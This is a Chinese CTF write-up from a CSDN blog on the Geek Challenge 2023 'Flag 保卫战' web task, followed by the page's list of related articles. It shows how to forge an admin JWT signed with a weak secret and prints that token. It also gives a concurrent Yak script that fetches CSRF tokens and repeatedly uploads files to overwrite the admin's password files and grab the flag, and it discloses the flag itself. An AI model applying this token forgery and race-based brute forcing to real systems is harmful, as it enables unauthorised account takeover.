极客大挑战Flag 保卫战题目WP

最新推荐文章于 2024-07-23 13:09:12 发布
最新推荐文章于 2024-07-23 13:09:12 发布
阅读量449 收藏 6
点赞数 9
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yakproject/article/details/135456894
版权

@Go0p师傅

flag保卫战该题目源码位于: https://github.com/yaklang/yaklang/tree/geek2023

flag:SYC{75ec9b17-2284-447f-9faa-babccc8f159c}

题目介绍:

管理员为了flag不被发现,一顿操作后,自己都不知道访问的密码了

考点:

JWT 越权,并发请求,写脚本能力

过程:

访问靶场地址,发现登录页面

查看网页源码,发现访客密码 123456,发现 api 接口 /flag?pass=

随意使用用户名,a,密码 123456 进行登录尝试

通过后台提示信息可知,有一个管理员用户,获取 flag 的密码是四个文件内容相连,推测存在越权,并且能够覆盖管理员设置的文件,也就是重置密码

先随意上传一个文件同时进行抓包,数据包如下

前端显示,保存文件名的方式应该是 用户名-随机值,猜测需要爆破,碰撞出名为 管理员-随机值 的文件

上传的数据包中,发现了 JWT 进行鉴权以及一个 yak-token 的上传字段,先尝试解析读取 JWT 信息,发现使用了弱密码,用户为 a,使用弱密码进行管理员账户的 JWT Token 伪造

通过 JWT 解析出来的信息,这里我直接使用 yak 生成了,大家也可以找在线网站进行 JWT 的编辑还原

使用修改为 admin 的 Token 继续尝试发包,发现 Forbidden - CSRF token invalid

现在来看看前面提到的 yak-token字段,分析前端 JS 发现有一个 new-csrf-token的接口,在前端每次点击上传文件时,都会先去获取一个新的 csrf-token

可以开始尝试编写脚本,根据上面的思路我们爆破的步骤为,先获取 csrf-token,构造 upload 数据包,文件内容随意,这里使用 1,上传完成后,请求一次 /flag?pass=1111(管理员提示4个文件内容相连)由于定期会清楚缓存文件,所以最好使用并发,这里直接使用 Yakit 序列功能,后面也提供了 yak 代码,大家也可以使用 python 编写代码

Step 1 设置重复发包,并发,提取 token ,供 step 2 中使用

Step 2

Step 3

拖入一个序列组,点击执行

Yak 代码

// cookie 中的 jwt token 已被替换为 admin
getToken = func() {
    raw = `GET /new-csrf-token HTTP/1.1
Host: 127.0.0.1:8089
Cookie: jwt-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.47k0jdPsb9JLdi1kgQxF9Gv4tyCoZ1T5nKZiuODYbbg

`

    rsp, _ = poc.HTTP(raw, poc.https(false))~

    cookie = poc.GetHTTPPacketCookie(rsp, "yak_csrf")

    _, body = poc.Split(rsp)

    return cookie, string(body)
}

// cookie 中的 jwt-token 已经被替换为 admin 用户
postUpload = func(cookie, token) {
    raw2 = f`POST /upload HTTP/1.1
Host: 127.0.0.1:8089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Cookie: jwt-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.47k0jdPsb9JLdi1kgQxF9Gv4tyCoZ1T5nKZiuODYbbg; yak_csrf=${cookie}; Expires="Fri%2C+08+Sep+2023+13%3A19%3A34+GMT"; Max-Age=10; HttpOnly=; SameSite=LaxAccept: */*
Referer: http://192.168.124.14:8089/upload
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ru;q=0.6
X-Requested-With: XMLHttpRequest
Origin: http://192.168.124.14:8089
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIDPlMGmz86uvgyNM
Content-Length: 385

------WebKitFormBoundaryIDPlMGmz86uvgyNM
Content-Disposition: form-data; name="filename"; filename="1.zip"
Content-Type: text/aa

1
------WebKitFormBoundaryIDPlMGmz86uvgyNM
Content-Disposition: form-data; name="yak-token"

${token}
------WebKitFormBoundaryIDPlMGmz86uvgyNM--

`
    _, _ = poc.HTTP(raw2, poc.https(false))~
}

getFlag = func() {
    raw = `GET /flag?pass=1111 HTTP/1.1
Host: 127.0.0.1:8089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

`
    _, _ = poc.HTTP(raw, poc.https(false))~
}

synWg = sync.NewSizedWaitGroup(20)

for i = 0; i < 500; i++ {
    synWg.Add()
    go fn {
        defer synWg.Done()

        cookie, token = getToken()
        postUpload(cookie, token)
        getFlag()
    }
}
synWg.Wait()

YakProject
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络空间安全中职重庆市比赛赛解析分析四个阶段解析答案(共五套)第二套题目
PushSafe
05-03 1407
2021年中职组“网络安全”赛项 重庆市竞赛任务书B 一、竞赛时间 总计:480分钟 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 A、B模块 A-1 Windows操作系统安全配置 180分钟 200分 A-2 Linux操作系统安全配置 B-1 系统漏洞 400分 B-2 隐藏信息探索 B-3 服务远程控制 B-4 Web安全之综合渗透测试 阶段切换 阶段切换(午休) 120分钟 0 C、D模块 C模块 CTF夺旗-攻击 180分钟 200分 D模块 CTF夺旗-防御 .
170913 逆向-问鼎杯库(找flag
whklhhhh的博客
09-14 4669
1625-5 王子昂 总结《2017年9月13日》 【连续第346天总结】 A. 问鼎杯库-逆向 B.找flag运行后是一个单纯的文本输入框和灰色的GetFlag按钮 拖入IDA反编译,没有main函数,只有start函数 start里没看到什么可以继续往下的内容,直接搜索字符串: 一眼看到flag,兴奋地提交 错误OTZ 那看来程序中还有对flag的处理,双击追到内存然后按
不一样的flag
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-29 355
buuctf-不一样的flag
CGCTF-Web-签到2
1stPeak's Blog
06-18 1191
CGCTF-Web-签到2 1.题目:修改前端代码即可绕过,获得flag 2.因为zhimakaimen长度为11位,但该输入框最多只能输入长度为10的值,因此,将下图中maxlength="10"改为maxlength="222"(长度大于或等于zhimakaimen字符串长度即可) 3.获得flag ...
越权漏洞简介及靶场演示
seek_2022的博客
06-04 5137
信息安全行业关于权限有两个常见的概念,一个叫越权,一个叫提权。提权指的是低权限的用户通过技术手段提升到高权限的用户。(权限一般是指计算机权限,提权是指从用户权限提升到管理员权限)。越权一般是指低权限用户进行高权限的操作或平级操作,越权漏洞出现的地方一般以网页、app为主。 越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。 ...
LeetCode算法1
weixin_40277148的博客
12-30 118
文章目录LeetCode1——Two Sum(Easy)DescriptionExample方法一:O(n^2^)+双重循环方法二:O(n)+HashMap方法三:O(nlogn) LeetCode1——Two Sum(Easy) Description Given an array of integers, return indices of the two numbers such that ...
基于c++开发的模仿王国保卫战游戏源码(大学生项目).zip
06-02
基于c++开发的模仿王国保卫战游戏源码(大学生项目).zip基于c++开发的模仿王国保卫战游戏源码(大学生项目).zip基于c++开发的模仿王国保卫战游戏源码(大学生项目).zip基于c++开发的模仿王国保卫战游戏源码(大学生项目)...
中国电信2023巅峰极客网络安全技能挑战赛的一道Misc题目
07-22
中国电信2023巅峰极客网络安全技能挑战赛的一道Misc题目
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客谷杯WP1
08-03
极客谷杯WP1反编译分析 标解释 "极客谷杯WP1"是指在极客谷平台上的一个WP1项目,WP1是指Web Protection 1的缩写,表示该项目是一个Web保护项目。 描述解释 描述信息为空,但结合标签"软件/插件 intellij idea...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
flag 与 “零值” 进行比较 【笔试
weixin_40989362的博客
07-22 1061
Bool 变量 与零值比较 bool flag; 代码示例 bool flag; if(flag) //表示flag为真 if(!flag) //表示为假 //这种情况编程时不要用 if(flag == 0) if(flag == 1) if(flag == false) if(flag == true) 整型变量与零值比较 int flag 规则:应当将整形变量用“==”或“!=”...
CTF中Web找Flag题目(1)
热门推荐
TLXX1126的博客
07-13 3万+
今天做的一个题目上给了一个链接,链接是一个网页,网页上让输入一个pass key, 做步骤是先用BP抓包,然后repeter看返回包 其中Content-Row是一个用base64加密过的一串字符,然后将其解码便得到了pass key 听火种CTF中胖虎大佬讲解是这么说的: 这个功能就是抓包和看返回包的过程 就跟你要看一个网站,你就得把你的IP地址各种请求告诉网站,
ctf库-FLAG
miko2018的博客
08-21 1万+
&lt;题目&gt; FLAG 请输入 FLAG,下面的页面会告诉你 FLAG 是否正确 解链接: http://ctf5.shiyanbar.com/qwctf/flag-checker.html &lt;解答&gt; 打开连接。发现是一个对话框。 任意输入一个值后,提示“wrong…”,也就是说只有输入正确的值才能获得flag。 ※在Chrome下使用ctrl...
15 flag的应用
tklalll的博客
05-01 880
flag用于作为循环判断的条件。 flag = 1 则可以进入下一次循环 内层循环flag = 0, 跳出循环后,可以手动置1,以进入外层循环的下一次循环 外层循环需要结束,则用break 跳出
bugku web9~16 write up
h0ryit的博客
04-28 3115
bugku web9~16 write up 域名解析 题目描述:听说把flag.bugku.com 解析到120.24.86.145 就能拿到flag 这里需要了解两个概念: 域名解析: 域名解析是将域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域...
“微软蓝屏”事件暴露网络安全哪些问
最新发布
sheji888的专栏
07-23 264
微软蓝屏”事件是指2024年7月19日发生的一起全球性技术故障,主要涉及微软视窗(Windows)操作系统及其相关应用和服务。
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值